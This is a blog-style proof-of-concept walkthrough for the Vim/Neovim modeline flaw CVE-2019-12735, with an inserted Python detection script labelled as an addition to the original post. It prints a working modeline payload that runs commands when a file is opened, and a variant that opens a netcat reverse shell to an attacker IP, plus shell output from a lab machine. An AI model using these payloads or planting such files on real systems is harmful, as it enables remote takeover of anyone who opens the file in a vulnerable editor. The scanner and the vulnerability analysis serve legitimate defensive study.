Exploit PoC: Linux command execution on Vim/Neovim vulnerability (CVE-2019-12735)

Magrabur Sofily
Jun 11, 2019 · 3 min read

Category: Remote Code Execution
Severity: High
Description:
The flaw lies in how the Linux Vim and Neovim editors handle "modelines", a feature that is enabled by default and automatically finds and applies a set of custom editor preferences that the creator of a file places in its first and last lines. As a result, merely opening an innocent-looking, specially crafted file with Vim or Neovim could let an attacker execute commands on the Linux system and ultimately take over the target.

Affected Products:
• Vim before version 8.1.1365
• Neovim before version 0.3.6

Here is a step-by-step PoC of exploiting the vulnerability:

PoC Machine: I used my Kali Linux (4.17.8 x86_64) as the target machine for this purpose.
Victim machine IP: 172.31.242.25
Attacking machine IP: 172.31.242.143
PoC Summary:
1. Checked if the modeline option has not been disabled.
2. Quick PoC for command execution on vim editor.
3. Running a shell command for creating a reverse shell to own the target system.

Step-1: My Kali Linux kernel details:
root@kali:~# cat /proc/version
Linux version 4.17.0-kali1-amd64 (devel@kali.org) (gcc version 7.3.0 (Debian 7.3.0-25)) #1 SMP Debian 4.17.8-1kali1 (2018-07-24)
root@kali:~#

[Image: Victim Kali machine details]

Step-2: Enable modelines in the vimrc file. Just add ':set modeline' at the end of the file and save.
root@kali:~# tail -2 /etc/vim/vimrc

:set modeline
root@kali:~#

[Image: vimrc file]

Step-3: Create a file cmdtest.txt containing the command-execution payload.
root@kali:~# cat cmdtest.txt
:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
root@kali:~#

[Image: command execution file]

Step-4: Now open the above file with the vim editor. It prints the output of 'uname -a', which shows that the editor is vulnerable.
root@kali:~# vim cmdtest.txt
Linux kali 4.17.0-kali1-amd64 #1 SMP Debian 4.17.8-1kali1 (2018-07-24) x86_64 GNU/Linux
Press ENTER or type command to continue

[Image: Successful command execution]

Press Enter; this takes you into the Vim editor. Use ':q!' to exit from it.
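A defender can hunt for files carrying the modeline pattern used in cmdtest.txt before anyone opens them. The scanner below is an added example and not part of the original post; it is a heuristic that inspects the head and tail lines Vim honours for modelines and flags any that set expression-evaluating options (the payload uses fdm/fde/fdt), with the sample lines constructed inline.

```python
"""Added example: flag modelines that use expression options, the pattern behind
the cmdtest.txt payload. Heuristic only; the real fix is updating past the
affected versions (Vim 8.1.1365 / Neovim 0.3.6) or 'set nomodeline'."""
import re
from typing import List, Tuple

# Vim only honours modelines in the first and last 'modelines' lines (default 5).
MODELINES = 5

# A modeline is "vi:", "vim:" or "ex:" at line start or after whitespace.
MODELINE_RE = re.compile(r"(?:^|\s)(?:vi|vim|ex):(?P<opts>.*)$")

# Options whose values are evaluated as expressions; the payload uses fdm/fde/fdt.
EXPR_OPTIONS = ("fdm=expr", "foldmethod=expr", "fde=", "foldexpr=", "fdt=", "foldtext=",
                "inde=", "indentexpr=", "fex=", "formatexpr=", "inex=", "includeexpr=")
# Calls seen in the public payload that smuggle a ':source!' past the sandbox.
SUSPICIOUS_CALLS = ("assert_fails(", "source", "execute(", "system(")


def scan_lines(lines: List[str]) -> List[Tuple[int, str]]:
    """Return (1-based line number, reason) for each suspicious modeline in head/tail."""
    n = len(lines)
    window = set(range(min(MODELINES, n))) | set(range(max(0, n - MODELINES), n))
    findings = []
    for i in sorted(window):
        m = MODELINE_RE.search(lines[i])
        if not m:
            continue
        opts = m.group("opts")
        hit_opts = [o for o in EXPR_OPTIONS if o in opts]
        if not hit_opts:
            continue  # plain "vim: set ts=4" style modelines are harmless here
        hit_calls = [c for c in SUSPICIOUS_CALLS if c in opts]
        findings.append((i + 1, f"expression option(s) {hit_opts}, calls {hit_calls}"))
    return findings


def scan_file(path: str) -> List[Tuple[int, str]]:
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_lines(fh.read().splitlines())


if __name__ == "__main__":
    # Constructed sample: a benign modeline followed by the cmdtest.txt payload.
    sample = [
        "# vim: set ts=4 sw=4 et:",
        r':!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="',
    ]
    for lineno, reason in scan_lines(sample):
        print(f"line {lineno}: {reason}")
```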

Step-5: Now comes the real fun part: creating a reverse shell.
Create a new file, or edit cmdtest.txt, replacing the simple uname command with a netcat reverse-shell command.

Step-5.1: On the attacker side:
Set up a netcat listener on the attacking machine.

[Image: Attacking machine setup]

Step-5.2: On the victim side: prepare and run the exploit
I am creating a new file named 'revshell.txt' in which I replaced the previous 'uname -a' command with a simple netcat reverse-shell command.

root@kali:~# cat revshell.txt
:!nc -nv 172.31.242.143 4444 -e /bin/sh ||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="
root@kali:~#

[Image: Run the exploit]

Step-5.3: Finally, open revshell.txt with the vim command and watch the attacker machine for the reverse shell.

Victim side:
root@kali:~# vim revshell.txt
(UNKNOWN) [172.31.242.143] 4444 (?) open

[Image: Reverse shell created]

Attacker side:

[Image: Successfully owned victim machine]
